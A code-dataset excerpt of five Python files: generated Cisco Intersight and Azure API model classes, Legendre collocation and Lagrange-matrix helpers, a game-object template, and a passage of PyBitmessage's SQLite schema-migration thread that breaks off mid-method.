ext
stringclasses
9 values
sha
stringlengths
40
40
content
stringlengths
3
1.04M
py
7df9dfe7c3aa03fb3cb4bd2b2b287720e1754e3e
# coding: utf-8 """ Cisco Intersight OpenAPI specification. The Cisco Intersight OpenAPI specification. OpenAPI spec version: 1.0.9-1461 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class HclHardwareCompatibilityProfile(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'object_type': 'str', 'driver_iso_url': 'str', 'error_code': 'str', 'id': 'str', 'os_vendor': 'str', 'os_version': 'str', 'processor_model': 'str', 'products': 'list[HclProduct]', 'server_model': 'str', 'server_revision': 'str', 'ucs_version': 'str', 'version_type': 'str' } attribute_map = { 'object_type': 'ObjectType', 'driver_iso_url': 'DriverIsoUrl', 'error_code': 'ErrorCode', 'id': 'Id', 'os_vendor': 'OsVendor', 'os_version': 'OsVersion', 'processor_model': 'ProcessorModel', 'products': 'Products', 'server_model': 'ServerModel', 'server_revision': 'ServerRevision', 'ucs_version': 'UcsVersion', 'version_type': 'VersionType' } def __init__(self, object_type=None, driver_iso_url=None, error_code='Success', id=None, os_vendor=None, os_version=None, processor_model=None, products=None, server_model=None, server_revision=None, ucs_version=None, version_type='UCSM'): """ HclHardwareCompatibilityProfile - a model defined in Swagger """ self._object_type = None self._driver_iso_url = None self._error_code = None self._id = None self._os_vendor = None self._os_version = None self._processor_model = None self._products = None self._server_model = None self._server_revision = None self._ucs_version = None self._version_type = None if object_type is not None: self.object_type = object_type if driver_iso_url is not None: self.driver_iso_url = driver_iso_url if error_code is not None: self.error_code = error_code if id is not None: self.id = id if os_vendor is not None: self.os_vendor = os_vendor if os_version is not None: self.os_version = os_version if processor_model is not None: self.processor_model = processor_model if products is not None: self.products = products if server_model is not None: self.server_model = server_model if server_revision is not None: self.server_revision = server_revision if ucs_version is not None: self.ucs_version = ucs_version if version_type is not None: self.version_type = version_type @property def object_type(self): """ Gets the object_type of this HclHardwareCompatibilityProfile. The concrete type of this complex type. The ObjectType property must be set explicitly by API clients when the type is ambiguous. In all other cases, the ObjectType is optional. The type is ambiguous when a managed object contains an array of nested documents, and the documents in the array are heterogeneous, i.e. the array can contain nested documents of different types. :return: The object_type of this HclHardwareCompatibilityProfile. :rtype: str """ return self._object_type @object_type.setter def object_type(self, object_type): """ Sets the object_type of this HclHardwareCompatibilityProfile. The concrete type of this complex type. The ObjectType property must be set explicitly by API clients when the type is ambiguous. In all other cases, the ObjectType is optional. The type is ambiguous when a managed object contains an array of nested documents, and the documents in the array are heterogeneous, i.e. the array can contain nested documents of different types. :param object_type: The object_type of this HclHardwareCompatibilityProfile. :type: str """ self._object_type = object_type @property def driver_iso_url(self): """ Gets the driver_iso_url of this HclHardwareCompatibilityProfile. Url for the ISO with the drivers supported for the server. :return: The driver_iso_url of this HclHardwareCompatibilityProfile. :rtype: str """ return self._driver_iso_url @driver_iso_url.setter def driver_iso_url(self, driver_iso_url): """ Sets the driver_iso_url of this HclHardwareCompatibilityProfile. Url for the ISO with the drivers supported for the server. :param driver_iso_url: The driver_iso_url of this HclHardwareCompatibilityProfile. :type: str """ self._driver_iso_url = driver_iso_url @property def error_code(self): """ Gets the error_code of this HclHardwareCompatibilityProfile. Error code indicating the compatibility status. :return: The error_code of this HclHardwareCompatibilityProfile. :rtype: str """ return self._error_code @error_code.setter def error_code(self, error_code): """ Sets the error_code of this HclHardwareCompatibilityProfile. Error code indicating the compatibility status. :param error_code: The error_code of this HclHardwareCompatibilityProfile. :type: str """ allowed_values = ["Success", "Unknown", "UnknownServer", "InvalidUcsVersion", "ProcessorNotSupported", "OSNotSupported", "OSUnknown", "UCSVersionNotSupported", "UcsVersionServerOSCombinationNotSupported", "ProductUnknown", "ProductNotSupported", "DriverNameNotSupported", "FirmwareVersionNotSupported", "DriverVersionNotSupported", "FirmwareVersionDriverVersionCombinationNotSupported", "FirmwareVersionAndDriverVersionNotSupported", "FirmwareVersionAndDriverNameNotSupported", "InternalError", "MarshallingError", "Exempted"] if error_code not in allowed_values: raise ValueError( "Invalid value for `error_code` ({0}), must be one of {1}" .format(error_code, allowed_values) ) self._error_code = error_code @property def id(self): """ Gets the id of this HclHardwareCompatibilityProfile. Identifier of the hardware compatibility profile. :return: The id of this HclHardwareCompatibilityProfile. :rtype: str """ return self._id @id.setter def id(self, id): """ Sets the id of this HclHardwareCompatibilityProfile. Identifier of the hardware compatibility profile. :param id: The id of this HclHardwareCompatibilityProfile. :type: str """ self._id = id @property def os_vendor(self): """ Gets the os_vendor of this HclHardwareCompatibilityProfile. Vendor of the Operating System running on the server. :return: The os_vendor of this HclHardwareCompatibilityProfile. :rtype: str """ return self._os_vendor @os_vendor.setter def os_vendor(self, os_vendor): """ Sets the os_vendor of this HclHardwareCompatibilityProfile. Vendor of the Operating System running on the server. :param os_vendor: The os_vendor of this HclHardwareCompatibilityProfile. :type: str """ self._os_vendor = os_vendor @property def os_version(self): """ Gets the os_version of this HclHardwareCompatibilityProfile. Version of the Operating System running on the server. :return: The os_version of this HclHardwareCompatibilityProfile. :rtype: str """ return self._os_version @os_version.setter def os_version(self, os_version): """ Sets the os_version of this HclHardwareCompatibilityProfile. Version of the Operating System running on the server. :param os_version: The os_version of this HclHardwareCompatibilityProfile. :type: str """ self._os_version = os_version @property def processor_model(self): """ Gets the processor_model of this HclHardwareCompatibilityProfile. Model of the processor present in the server. :return: The processor_model of this HclHardwareCompatibilityProfile. :rtype: str """ return self._processor_model @processor_model.setter def processor_model(self, processor_model): """ Sets the processor_model of this HclHardwareCompatibilityProfile. Model of the processor present in the server. :param processor_model: The processor_model of this HclHardwareCompatibilityProfile. :type: str """ self._processor_model = processor_model @property def products(self): """ Gets the products of this HclHardwareCompatibilityProfile. List of the products (adapters/storage controllers) for which compatibility status needs to be checked. :return: The products of this HclHardwareCompatibilityProfile. :rtype: list[HclProduct] """ return self._products @products.setter def products(self, products): """ Sets the products of this HclHardwareCompatibilityProfile. List of the products (adapters/storage controllers) for which compatibility status needs to be checked. :param products: The products of this HclHardwareCompatibilityProfile. :type: list[HclProduct] """ self._products = products @property def server_model(self): """ Gets the server_model of this HclHardwareCompatibilityProfile. Model of the server as returned by UCSM/CIMC XML API. :return: The server_model of this HclHardwareCompatibilityProfile. :rtype: str """ return self._server_model @server_model.setter def server_model(self, server_model): """ Sets the server_model of this HclHardwareCompatibilityProfile. Model of the server as returned by UCSM/CIMC XML API. :param server_model: The server_model of this HclHardwareCompatibilityProfile. :type: str """ self._server_model = server_model @property def server_revision(self): """ Gets the server_revision of this HclHardwareCompatibilityProfile. Revision of the server model. :return: The server_revision of this HclHardwareCompatibilityProfile. :rtype: str """ return self._server_revision @server_revision.setter def server_revision(self, server_revision): """ Sets the server_revision of this HclHardwareCompatibilityProfile. Revision of the server model. :param server_revision: The server_revision of this HclHardwareCompatibilityProfile. :type: str """ self._server_revision = server_revision @property def ucs_version(self): """ Gets the ucs_version of this HclHardwareCompatibilityProfile. Version of the UCS software. :return: The ucs_version of this HclHardwareCompatibilityProfile. :rtype: str """ return self._ucs_version @ucs_version.setter def ucs_version(self, ucs_version): """ Sets the ucs_version of this HclHardwareCompatibilityProfile. Version of the UCS software. :param ucs_version: The ucs_version of this HclHardwareCompatibilityProfile. :type: str """ self._ucs_version = ucs_version @property def version_type(self): """ Gets the version_type of this HclHardwareCompatibilityProfile. Type of the UCS version indicating whether it is a UCSM release vesion or a IMC release. :return: The version_type of this HclHardwareCompatibilityProfile. :rtype: str """ return self._version_type @version_type.setter def version_type(self, version_type): """ Sets the version_type of this HclHardwareCompatibilityProfile. Type of the UCS version indicating whether it is a UCSM release vesion or a IMC release. :param version_type: The version_type of this HclHardwareCompatibilityProfile. :type: str """ allowed_values = ["UCSM", "IMC"] if version_type not in allowed_values: raise ValueError( "Invalid value for `version_type` ({0}), must be one of {1}" .format(version_type, allowed_values) ) self._version_type = version_type def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, HclHardwareCompatibilityProfile): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
py
7df9e00b041cb908c151a38f1b12a51f40b60696
from enum import auto, Enum from typing import List import numpy as np from numpy.polynomial.legendre import Legendre from numpy.polynomial.polynomial import Polynomial from scipy.interpolate import lagrange class CollocationEnum(Enum): """CollocationEnum Scheme enumeration. A collcation scheme consists of two main ingredients: - the position of the collocation point - the interpolating polynomial used See: https://hal.archives-ouvertes.fr/hal-01615132/document """ LG = auto() LGR = auto() LGL = auto() # FIXME: this is really just getting the Legendere root points, not collocation points def get_collocation_points( num_points: int, scheme: CollocationEnum = CollocationEnum.LGR ) -> np.ndarray: """Retrieve 1D collocation points for a given scheme in the interval of [-1, 1] Note: Some methods include the end points of -1, 1, while some others don't. """ if not isinstance(scheme, CollocationEnum): raise TypeError( f"Expected scheme to be of type {CollocationEnum}, but got {type(scheme)} instead" ) # TODO: would this be different for different schemes? assert num_points >= 1 # TODO: perhaps we should just combine everything into a Collocation Class if scheme == CollocationEnum.LGR: # root of Legendre polynomial, whrre P is a lgrange function # P_{N-1} + P_N = 0, but flipped around zero to include t=1 coefficients = [0] * (num_points - 1) + [1, 1] characteristic_polynomial = Legendre(coefficients) # solve and flip collocation_points = -characteristic_polynomial.roots()[::-1] elif scheme == CollocationEnum.LG: # roots of P_N = 0 coefficients = [0] * num_points + [1] characteristic_polynomial = Legendre(coefficients) collocation_points = characteristic_polynomial.roots() elif scheme == CollocationEnum.LGL: # roots of P_dot_{N-1} + [-1, 1] coefficients = [0] * (num_points - 1) + [1] characteristic_polynomial = Legendre(coefficients).deriv() collocation_points = np.append( np.insert(characteristic_polynomial.roots(), 0, -1), 1 ) else: raise NotImplemented(scheme) return collocation_points def make_lagrange_polynomial(support: np.ndarray, index: int) -> Polynomial: """Create the i-th lagrange polynomial""" weights = np.zeros_like(support) weights[index] = 1 # NOTE: lagrange returns coef in decending power order, which is opposite to numpy # Polynomials. coefficients = lagrange(support, weights).coef[::-1] return Polynomial(coefficients) def make_lagrange_basis(support: np.ndarray) -> List[Polynomial]: """Create a list of lagrange basis of varying order on the same support.""" return [make_lagrange_polynomial(support, index) for index in range(len(support))] def build_lagrange_differential_matrix( support: np.ndarray, evaluation_points: np.ndarray ) -> np.ndarray: """Differential matrix for computing the derivative of a lagrange polynomial using linear matrix vector multiplication""" lagrange_basis = make_lagrange_basis(support) polynomials = [ lagrange_polynomial.deriv() for lagrange_polynomial in lagrange_basis ] return np.array([p(evaluation_points) for p in polynomials]).T def build_lagrange_integration_matrix( support: np.ndarray, evaluation_points: np.ndarray ) -> np.ndarray: """Integration matrix for computing the definitive integral of a lagrange polynomial using linear matrix vector multiplication""" lagrange_basis = make_lagrange_basis(support) polynomials = [ lagrange_polynomial.integ() for lagrange_polynomial in lagrange_basis ] # NOTE: eq39, the integral polynomial is a definite integral, so need to call the # integral twice to remove the part for tau < support[0] return np.array([p(evaluation_points) - p(support[0]) for p in polynomials]).T
py
7df9e1226a64805f3703e0af4957d610068ca728
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from .sub_resource import SubResource class ApplicationGatewayIPConfiguration(SubResource): """IP configuration of an application gateway. Currently 1 public and 1 private IP configuration is allowed. :param id: Resource ID. :type id: str :param subnet: Reference of the subnet resource. A subnet from where application gateway gets its private address. :type subnet: :class:`SubResource <azure.mgmt.network.v2016_09_01.models.SubResource>` :param provisioning_state: Provisioning state of the application gateway subnet resource. Possible values are: 'Updating', 'Deleting', and 'Failed'. :type provisioning_state: str :param name: Name of the resource that is unique within a resource group. This name can be used to access the resource. :type name: str :param etag: A unique read-only string that changes whenever the resource is updated. :type etag: str """ _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'subnet': {'key': 'properties.subnet', 'type': 'SubResource'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'etag': {'key': 'etag', 'type': 'str'}, } def __init__(self, id=None, subnet=None, provisioning_state=None, name=None, etag=None): super(ApplicationGatewayIPConfiguration, self).__init__(id=id) self.subnet = subnet self.provisioning_state = provisioning_state self.name = name self.etag = etag
py
7df9e239b28b5d487e6b237dc3bf415f531fbd66
#### NOTICE: THIS FILE IS AUTOGENERATED #### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY #### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES from swgpy.object import * def create(kernel): result = Intangible() result.template = "object/draft_schematic/item/shared_craftable_bug_habitat.iff" result.attribute_template_id = -1 result.stfName("string_id_table","") #### BEGIN MODIFICATIONS #### #### END MODIFICATIONS #### return result
py
7df9e253ac23ade41d6e2bb68f94b94964ccd8a3
""" sqlThread is defined here """ import os import shutil # used for moving the messages.dat file import sqlite3 import sys import threading import time try: import helper_sql import helper_startup import paths import queues import state from addresses import encodeAddress from bmconfigparser import config, config_ready from debug import logger from tr import _translate except ImportError: from . import helper_sql, helper_startup, paths, queues, state from .addresses import encodeAddress from .bmconfigparser import config, config_ready from .debug import logger from .tr import _translate class sqlThread(threading.Thread): """A thread for all SQL operations""" def __init__(self): threading.Thread.__init__(self, name="SQL") def run(self): # pylint: disable=too-many-locals, too-many-branches, too-many-statements """Process SQL queries from `.helper_sql.sqlSubmitQueue`""" helper_sql.sql_available = True config_ready.wait() self.conn = sqlite3.connect(state.appdata + 'messages.dat') self.conn.text_factory = str self.cur = self.conn.cursor() self.cur.execute('PRAGMA secure_delete = true') # call create_function for encode address self.create_function() try: self.cur.execute( '''CREATE TABLE inbox (msgid blob, toaddress text, fromaddress text, subject text,''' ''' received text, message text, folder text, encodingtype int, read bool, sighash blob,''' ''' UNIQUE(msgid) ON CONFLICT REPLACE)''') self.cur.execute( '''CREATE TABLE sent (msgid blob, toaddress text, toripe blob, fromaddress text, subject text,''' ''' message text, ackdata blob, senttime integer, lastactiontime integer,''' ''' sleeptill integer, status text, retrynumber integer, folder text, encodingtype int, ttl int)''') self.cur.execute( '''CREATE TABLE subscriptions (label text, address text, enabled bool)''') self.cur.execute( '''CREATE TABLE addressbook (label text, address text, UNIQUE(address) ON CONFLICT IGNORE)''') self.cur.execute( '''CREATE TABLE blacklist (label text, address text, enabled bool)''') self.cur.execute( '''CREATE TABLE whitelist (label text, address text, enabled bool)''') self.cur.execute( '''CREATE TABLE pubkeys (address text, addressversion int, transmitdata blob, time int,''' ''' usedpersonally text, UNIQUE(address) ON CONFLICT REPLACE)''') self.cur.execute( '''CREATE TABLE inventory (hash blob, objecttype int, streamnumber int, payload blob,''' ''' expirestime integer, tag blob, UNIQUE(hash) ON CONFLICT REPLACE)''') self.cur.execute( '''INSERT INTO subscriptions VALUES''' '''('Bitmessage new releases/announcements','BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw',1)''') self.cur.execute( '''CREATE TABLE settings (key blob, value blob, UNIQUE(key) ON CONFLICT REPLACE)''') self.cur.execute('''INSERT INTO settings VALUES('version','11')''') self.cur.execute('''INSERT INTO settings VALUES('lastvacuumtime',?)''', ( int(time.time()),)) self.cur.execute( '''CREATE TABLE objectprocessorqueue''' ''' (objecttype int, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''') self.conn.commit() logger.info('Created messages database file') except Exception as err: if str(err) == 'table inbox already exists': logger.debug('Database file already exists.') else: sys.stderr.write( 'ERROR trying to create database file (message.dat). Error message: %s\n' % str(err)) os._exit(0) # If the settings version is equal to 2 or 3 then the # sqlThread will modify the pubkeys table and change # the settings version to 4. settingsversion = config.getint( 'bitmessagesettings', 'settingsversion') # People running earlier versions of PyBitmessage do not have the # usedpersonally field in their pubkeys table. Let's add it. if settingsversion == 2: item = '''ALTER TABLE pubkeys ADD usedpersonally text DEFAULT 'no' ''' parameters = '' self.cur.execute(item, parameters) self.conn.commit() settingsversion = 3 # People running earlier versions of PyBitmessage do not have the # encodingtype field in their inbox and sent tables or the read field # in the inbox table. Let's add them. if settingsversion == 3: item = '''ALTER TABLE inbox ADD encodingtype int DEFAULT '2' ''' parameters = '' self.cur.execute(item, parameters) item = '''ALTER TABLE inbox ADD read bool DEFAULT '1' ''' parameters = '' self.cur.execute(item, parameters) item = '''ALTER TABLE sent ADD encodingtype int DEFAULT '2' ''' parameters = '' self.cur.execute(item, parameters) self.conn.commit() settingsversion = 4 config.set( 'bitmessagesettings', 'settingsversion', str(settingsversion)) config.save() helper_startup.updateConfig() # From now on, let us keep a 'version' embedded in the messages.dat # file so that when we make changes to the database, the database # version we are on can stay embedded in the messages.dat file. Let us # check to see if the settings table exists yet. item = '''SELECT name FROM sqlite_master WHERE type='table' AND name='settings';''' parameters = '' self.cur.execute(item, parameters) if self.cur.fetchall() == []: # The settings table doesn't exist. We need to make it. logger.debug( "In messages.dat database, creating new 'settings' table.") self.cur.execute( '''CREATE TABLE settings (key text, value blob, UNIQUE(key) ON CONFLICT REPLACE)''') self.cur.execute('''INSERT INTO settings VALUES('version','1')''') self.cur.execute('''INSERT INTO settings VALUES('lastvacuumtime',?)''', ( int(time.time()),)) logger.debug('In messages.dat database, removing an obsolete field from the pubkeys table.') self.cur.execute( '''CREATE TEMPORARY TABLE pubkeys_backup(hash blob, transmitdata blob, time int,''' ''' usedpersonally text, UNIQUE(hash) ON CONFLICT REPLACE);''') self.cur.execute( '''INSERT INTO pubkeys_backup SELECT hash, transmitdata, time, usedpersonally FROM pubkeys;''') self.cur.execute('''DROP TABLE pubkeys''') self.cur.execute( '''CREATE TABLE pubkeys''' ''' (hash blob, transmitdata blob, time int, usedpersonally text, UNIQUE(hash) ON CONFLICT REPLACE)''') self.cur.execute( '''INSERT INTO pubkeys SELECT hash, transmitdata, time, usedpersonally FROM pubkeys_backup;''') self.cur.execute('''DROP TABLE pubkeys_backup;''') logger.debug( 'Deleting all pubkeys from inventory.' ' They will be redownloaded and then saved with the correct times.') self.cur.execute( '''delete from inventory where objecttype = 'pubkey';''') logger.debug('replacing Bitmessage announcements mailing list with a new one.') self.cur.execute( '''delete from subscriptions where address='BM-BbkPSZbzPwpVcYZpU4yHwf9ZPEapN5Zx' ''') self.cur.execute( '''INSERT INTO subscriptions VALUES''' '''('Bitmessage new releases/announcements','BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw',1)''') logger.debug('Commiting.') self.conn.commit() logger.debug('Vacuuming message.dat. You might notice that the file size gets much smaller.') self.cur.execute(''' VACUUM ''') # After code refactoring, the possible status values for sent messages # have changed. self.cur.execute( '''update sent set status='doingmsgpow' where status='doingpow' ''') self.cur.execute( '''update sent set status='msgsent' where status='sentmessage' ''') self.cur.execute( '''update sent set status='doingpubkeypow' where status='findingpubkey' ''') self.cur.execute( '''update sent set status='broadcastqueued' where status='broadcastpending' ''') self.conn.commit() # Let's get rid of the first20bytesofencryptedmessage field in # the inventory table. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) if int(self.cur.fetchall()[0][0]) == 2: logger.debug( 'In messages.dat database, removing an obsolete field from' ' the inventory table.') self.cur.execute( '''CREATE TEMPORARY TABLE inventory_backup''' '''(hash blob, objecttype text, streamnumber int, payload blob,''' ''' receivedtime integer, UNIQUE(hash) ON CONFLICT REPLACE);''') self.cur.execute( '''INSERT INTO inventory_backup SELECT hash, objecttype, streamnumber, payload, receivedtime''' ''' FROM inventory;''') self.cur.execute('''DROP TABLE inventory''') self.cur.execute( '''CREATE TABLE inventory''' ''' (hash blob, objecttype text, streamnumber int, payload blob, receivedtime integer,''' ''' UNIQUE(hash) ON CONFLICT REPLACE)''') self.cur.execute( '''INSERT INTO inventory SELECT hash, objecttype, streamnumber, payload, receivedtime''' ''' FROM inventory_backup;''') self.cur.execute('''DROP TABLE inventory_backup;''') item = '''update settings set value=? WHERE key='version';''' parameters = (3,) self.cur.execute(item, parameters) # Add a new column to the inventory table to store tags. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 1 or currentVersion == 3: logger.debug( 'In messages.dat database, adding tag field to' ' the inventory table.') item = '''ALTER TABLE inventory ADD tag blob DEFAULT '' ''' parameters = '' self.cur.execute(item, parameters) item = '''update settings set value=? WHERE key='version';''' parameters = (4,) self.cur.execute(item, parameters) # Add a new column to the pubkeys table to store the address version. # We're going to trash all of our pubkeys and let them be redownloaded. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 4: self.cur.execute('''DROP TABLE pubkeys''') self.cur.execute( '''CREATE TABLE pubkeys (hash blob, addressversion int, transmitdata blob, time int,''' '''usedpersonally text, UNIQUE(hash, addressversion) ON CONFLICT REPLACE)''') self.cur.execute( '''delete from inventory where objecttype = 'pubkey';''') item = '''update settings set value=? WHERE key='version';''' parameters = (5,) self.cur.execute(item, parameters) # Add a new table: objectprocessorqueue with which to hold objects # that have yet to be processed if the user shuts down Bitmessage. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 5: self.cur.execute('''DROP TABLE knownnodes''') self.cur.execute( '''CREATE TABLE objectprocessorqueue''' ''' (objecttype text, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''') item = '''update settings set value=? WHERE key='version';''' parameters = (6,) self.cur.execute(item, parameters) # changes related to protocol v3 # In table inventory and objectprocessorqueue, objecttype is now # an integer (it was a human-friendly string previously) item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 6: logger.debug( 'In messages.dat database, dropping and recreating' ' the inventory table.') self.cur.execute('''DROP TABLE inventory''') self.cur.execute( '''CREATE TABLE inventory''' ''' (hash blob, objecttype int, streamnumber int, payload blob, expirestime integer,''' ''' tag blob, UNIQUE(hash) ON CONFLICT REPLACE)''') self.cur.execute('''DROP TABLE objectprocessorqueue''') self.cur.execute( '''CREATE TABLE objectprocessorqueue''' ''' (objecttype int, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''') item = '''update settings set value=? WHERE key='version';''' parameters = (7,) self.cur.execute(item, parameters) logger.debug( 'Finished dropping and recreating the inventory table.') # The format of data stored in the pubkeys table has changed. Let's # clear it, and the pubkeys from inventory, so that they'll # be re-downloaded. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 7: logger.debug( 'In messages.dat database, clearing pubkeys table' ' because the data format has been updated.') self.cur.execute( '''delete from inventory where objecttype = 1;''') self.cur.execute( '''delete from pubkeys;''') # Any sending messages for which we *thought* that we had # the pubkey must be rechecked. self.cur.execute( '''UPDATE sent SET status='msgqueued' WHERE status='doingmsgpow' or status='badkey';''') query = '''update settings set value=? WHERE key='version';''' parameters = (8,) self.cur.execute(query, parameters) logger.debug('Finished clearing currently held pubkeys.') # Add a new column to the inbox table to store the hash of # the message signature. We'll use this as temporary message UUID # in order to detect duplicates. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 8: logger.debug( 'In messages.dat database, adding sighash field to' ' the inbox table.') item = '''ALTER TABLE inbox ADD sighash blob DEFAULT '' ''' parameters = '' self.cur.execute(item, parameters) item = '''update settings set value=? WHERE key='version';''' parameters = (9,) self.cur.execute(item, parameters) # We'll also need a `sleeptill` field and a `ttl` field. Also we # can combine the pubkeyretrynumber and msgretrynumber into one. item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 9: logger.info( 'In messages.dat database, making TTL-related changes:' ' combining the pubkeyretrynumber and msgretrynumber' ' fields into the retrynumber field and adding the' ' sleeptill and ttl fields...') self.cur.execute( '''CREATE TEMPORARY TABLE sent_backup''' ''' (msgid blob, toaddress text, toripe blob, fromaddress text, subject text, message text,''' ''' ackdata blob, lastactiontime integer, status text, retrynumber integer,''' ''' folder text, encodingtype int)''') self.cur.execute( '''INSERT INTO sent_backup SELECT msgid, toaddress, toripe, fromaddress,''' ''' subject, message, ackdata, lastactiontime,''' ''' status, 0, folder, encodingtype FROM sent;''') self.cur.execute('''DROP TABLE sent''') self.cur.execute( '''CREATE TABLE sent''' ''' (msgid blob, toaddress text, toripe blob, fromaddress text, subject text, message text,''' ''' ackdata blob, senttime integer, lastactiontime integer, sleeptill int, status text,''' ''' retrynumber integer, folder text, encodingtype int, ttl int)''') self.cur.execute( '''INSERT INTO sent SELECT msgid, toaddress, toripe, fromaddress, subject, message, ackdata,''' ''' lastactiontime, lastactiontime, 0, status, 0, folder, encodingtype, 216000 FROM sent_backup;''') self.cur.execute('''DROP TABLE sent_backup''') logger.info('In messages.dat database, finished making TTL-related changes.') logger.debug('In messages.dat database, adding address field to the pubkeys table.') # We're going to have to calculate the address for each row in the pubkeys # table. Then we can take out the hash field. self.cur.execute('''ALTER TABLE pubkeys ADD address text DEFAULT '' ;''') # replica for loop to update hashed address self.cur.execute('''UPDATE pubkeys SET address=(enaddr(pubkeys.addressversion, 1, hash)); ''') # Now we can remove the hash field from the pubkeys table. self.cur.execute( '''CREATE TEMPORARY TABLE pubkeys_backup''' ''' (address text, addressversion int, transmitdata blob, time int,''' ''' usedpersonally text, UNIQUE(address) ON CONFLICT REPLACE)''') self.cur.execute( '''INSERT INTO pubkeys_backup''' ''' SELECT address, addressversion, transmitdata, time, usedpersonally FROM pubkeys;''') self.cur.execute('''DROP TABLE pubkeys''') self.cur.execute( '''CREATE TABLE pubkeys''' ''' (address text, addressversion int, transmitdata blob, time int, usedpersonally text,''' ''' UNIQUE(address) ON CONFLICT REPLACE)''') self.cur.execute( '''INSERT INTO pubkeys SELECT''' ''' address, addressversion, transmitdata, time, usedpersonally FROM pubkeys_backup;''') self.cur.execute('''DROP TABLE pubkeys_backup''') logger.debug( 'In messages.dat database, done adding address field to the pubkeys table' ' and removing the hash field.') self.cur.execute('''update settings set value=10 WHERE key='version';''') # Update the address colunm to unique in addressbook table item = '''SELECT value FROM settings WHERE key='version';''' parameters = '' self.cur.execute(item, parameters) currentVersion = int(self.cur.fetchall()[0][0]) if currentVersion == 10: logger.debug( 'In messages.dat database, updating address column to UNIQUE' ' in the addressbook table.') self.cur.execute( '''ALTER TABLE addressbook RENAME TO old_addressbook''') self.cur.execute( '''CREATE TABLE addressbook''' ''' (label text, address text, UNIQUE(address) ON CONFLICT IGNORE)''') self.cur.execute( '''INSERT INTO addressbook SELECT label, address FROM old_addressbook;''') self.cur.execute('''DROP TABLE old_addressbook''') self.cur.execute('''update settings set value=11 WHERE key='version';''') # Are you hoping to add a new option to the keys.dat file of existing # Bitmessage users or modify the SQLite database? Add it right # above this line! try: testpayload = '\x00\x00' t = ('1234', 1, testpayload, '12345678', 'no') self.cur.execute('''INSERT INTO pubkeys VALUES(?,?,?,?,?)''', t) self.conn.commit() self.cur.execute( '''SELECT transmitdata FROM pubkeys WHERE address='1234' ''') queryreturn = self.cur.fetchall() for row in queryreturn: transmitdata, = row self.cur.execute('''DELETE FROM pubkeys WHERE address='1234' ''') self.conn.commit() if transmitdata == '': logger.fatal( 'Problem: The version of SQLite you have cannot store Null values.' ' Please download and install the latest revision of your version of Python' ' (for example, the latest Python 2.7 revision) and try again.\n') logger.fatal( 'PyBitmessage will now exit very abruptly.' ' You may now see threading errors related to this abrupt exit' ' but the problem you need to solve is related to SQLite.\n\n') os._exit(0) except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(While null value test) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) else: logger.error(err) # Let us check to see the last time we vaccumed the messages.dat file. # If it has been more than a month let's do it now. item = '''SELECT value FROM settings WHERE key='lastvacuumtime';''' parameters = '' self.cur.execute(item, parameters) queryreturn = self.cur.fetchall() for row in queryreturn: value, = row if int(value) < int(time.time()) - 86400: logger.info('It has been a long time since the messages.dat file has been vacuumed. Vacuuming now...') try: self.cur.execute(''' VACUUM ''') except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(While VACUUM) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) item = '''update settings set value=? WHERE key='lastvacuumtime';''' parameters = (int(time.time()),) self.cur.execute(item, parameters) 